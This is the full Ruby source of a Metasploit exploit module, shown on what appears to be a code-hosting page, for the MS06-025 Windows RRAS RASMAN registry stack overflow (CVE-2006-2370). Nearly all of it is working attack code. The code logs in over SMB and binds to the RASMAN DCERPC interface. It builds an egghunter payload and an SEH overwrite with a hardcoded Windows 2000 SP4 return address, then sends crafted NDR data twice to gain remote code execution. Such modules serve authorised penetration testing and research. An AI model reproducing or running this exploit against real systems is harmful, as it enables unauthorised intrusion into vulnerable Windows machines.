Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Egghunter9include Msf::Exploit::Remote::DCERPC10include Msf::Exploit::Remote::SMB::Client1112def initialize(info = {})13super(update_info(info,14'Name' => 'MS06-025 Microsoft RRAS Service RASMAN Registry Overflow',15'Description' => %q{16This module exploits a registry-based stack buffer overflow in the Windows Routing17and Remote Access Service. Since the service is hosted inside svchost.exe,18a failed exploit attempt can cause other system services to fail as well.19A valid username and password is required to exploit this flaw on Windows 2000.20When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.21Exploiting this flaw involves two distinct steps - creating the registry key22and then triggering an overwrite based on a read of this key. Once the key is23created, it cannot be recreated. This means that for any given system, you24only get one chance to exploit this flaw. Picking the wrong target will require25a manual removal of the following registry key before you can try again:26HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook27},28'Author' => [ 'pusscat', 'hdm' ],29'License' => BSD_LICENSE,30'References' =>31[32[ 'CVE', '2006-2370' ],33[ 'OSVDB', '26437' ],34[ 'BID', '18325' ],35[ 'MSB', 'MS06-025' ]36],37'Privileged' => true,38'DefaultOptions' =>39{40'EXITFUNC' => 'thread'41},42'Payload' =>43{44'Space' => 512,45'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",46'StackAdjustment' => -3500,47},48'Platform' => 'win',49'Targets' =>50[51[ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ], # call esi52],53'DefaultTarget' => 0,54'DisclosureDate' => '2006-06-13'))5556register_options(57[58OptString.new('SMBPIPE', [ true, "Rawr.", 'router']),59])60end6162# Post authentication bugs are rarely useful during automation63def autofilter64false65end6667def exploit68connect()69smb_login()70print_status("Trying target #{target.name}...")7172# Generate the egghunter payload73hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })74egg = hunter[1]7576# Pick a "filler" character that we know doesn't get mangled77# by the wide string conversion routines78filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"79fil = filset[ rand(filset.length) ].chr8081# Bind to the actual DCERPC interface82handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])83print_status("Binding to #{handle}")84dcerpc_bind(handle)85print_status("Bound to #{handle}")8687# Add giant blocks of guard data before and after the egg88eggdata =89fil * 1024 +90egg +91fil * 10249293# Place the egghunter where ESI happens to point94bof = (fil * 178)95bof[84, hunter[0].length] = hunter[0]9697# Overwrite the SEH ptr, even though ESP is smashed98# The handle after the ret must be an invalid address99pat =100(fil * 886) +101NDR.long(target.ret) +102(fil * 3) + "\xc0" +103bof104105type2 =106NDR.string( (fil * 1024) + "\x00" ) +107NDR.string( pat + "\x00" ) +108NDR.string( (fil * 4096) + "\x00" ) +109NDR.long(rand(0xffffffff)) +110NDR.long(rand(0xffffffff))111112type1 =113NDR.long(rand(0xffffffff)) + # OperatorDial114NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber115NDR.long(rand(0xffffffff)) + # UseLocation116NDR.long(rand(0xffffffff)) + # ShowLights117NDR.long(rand(0xffffffff)) + # ShowConnectStatus118NDR.long(rand(0xffffffff)) + # CloseOnDial119NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits120NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits121NDR.long(rand(0xffffffff)) + # SkipConnectComplete122NDR.long(rand(0xffffffff)) + # NewEntryWizard123NDR.long(rand(0xffffffff)) + # RedialAttempts124NDR.long(rand(0xffffffff)) + # RedialSeconds125NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds126NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure127NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing128NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery129NDR.long(rand(0xffffffff)) + # CallbackMode130131NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc132NDR.wstring("\x00" * 129) +133NDR.long(rand(0xffffffff)) +134NDR.wstring("\x00" * 520) +135NDR.wstring("\x00" * 520) +136137NDR.long(rand(0xffffffff)) +138NDR.long(rand(0xffffffff)) +139NDR.long(rand(0xffffffff)) +140NDR.long(rand(0xffffffff)) +141NDR.long(rand(0xffffffff)) +142NDR.long(rand(0xffffffff)) +143NDR.long(rand(0xffffffff)) +144NDR.long(rand(0xffffffff)) +145146NDR.string("\x00" * 514) +147148NDR.long(rand(0xffffffff)) +149NDR.long(rand(0xffffffff))150151stubdata =152type1 +153NDR.long(rand(0xffffffff)) +154eggdata155156print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')157158begin159print_status('Creating the malicious registry key...')160response = dcerpc.call(0xA, stubdata)161162print_status('Attempting to trigger the base pointer overwrite...')163response = dcerpc.call(0xA, stubdata)164165rescue Rex::Proto::DCERPC::Exceptions::NoResponse166end167168handler169disconnect170end171end172173174